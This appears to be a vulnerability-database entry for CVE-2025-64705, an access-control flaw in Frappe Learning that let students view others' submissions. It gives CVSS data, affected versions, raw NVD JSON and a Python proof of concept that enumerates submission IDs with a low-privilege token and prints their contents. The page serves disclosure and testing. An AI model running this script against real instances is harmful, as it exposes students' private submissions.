Security Vulnerability Report
中文
CVE-2025-64705 CVSS 4.3 MEDIUM

CVE-2025-64705

Published: 2025-11-12 23:15:40
Last Modified: 2025-11-17 19:21:32
Source: [email protected]

Description

Frappe Learning is a learning system that helps users structure their content. Starting in version 2.0.0 and prior to version 2.41.0, users were able to access the submissions made by other students The issue has been fixed in version 2.41.0 by ensuring proper roles and redirecting if accessed via direct URL.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:* - VULNERABLE
Frappe Learning (LMS) >= 2.0.0
Frappe Learning (LMS) < 2.41.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-64705 PoC - Frappe Learning Unauthorized Submission Access # This PoC demonstrates accessing another student's submissions via direct URL import requests import sys TARGET_URL = "https://vulnerable-instance.com" ATTACKER_TOKEN = "attacker_session_token_here" def exploit_unauthorized_access(): """ Attacker with low-privilege account attempts to access other students' submissions by manipulating submission IDs in the URL parameter. """ headers = { "Authorization": f"Bearer {ATTACKER_TOKEN}", "Content-Type": "application/json" } # Try to access submissions of other students by iterating through submission IDs for submission_id in range(1, 100): url = f"{TARGET_URL}/api/method/frappe.lms.api.get_submission?submission_id={submission_id}" try: response = requests.get(url, headers=headers, timeout=10) # Check if unauthorized access is successful if response.status_code == 200: data = response.json() if "message" in data and "content" in data["message"]: print(f"[!] Successfully accessed submission ID: {submission_id}") print(f"[+] Submission content: {data['message']['content']}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") continue return False if __name__ == "__main__": print("CVE-2025-64705 PoC - Frappe Learning Unauthorized Submission Access") print("=" * 70) if exploit_unauthorized_access(): print("[+] Vulnerability confirmed!") else: print("[-] Exploitation failed or target not vulnerable.")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64705", "sourceIdentifier": "[email protected]", "published": "2025-11-12T23:15:39.983", "lastModified": "2025-11-17T19:21:31.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe Learning is a learning system that helps users structure their content. Starting in version 2.0.0 and prior to version 2.41.0, users were able to access the submissions made by other students The issue has been fixed in version 2.41.0 by ensuring proper roles and redirecting if accessed via direct URL."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.3, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "UNREPORTED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.41.0", "matchCriteriaId": "AFC84D34-76E4-4F11-BEA1-90F3D3C35B92"}]}]}], "references": [{"url": "https://github.com/frappe/lms/security/advisories/GHSA-qrvv-6g7r-g3v8", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.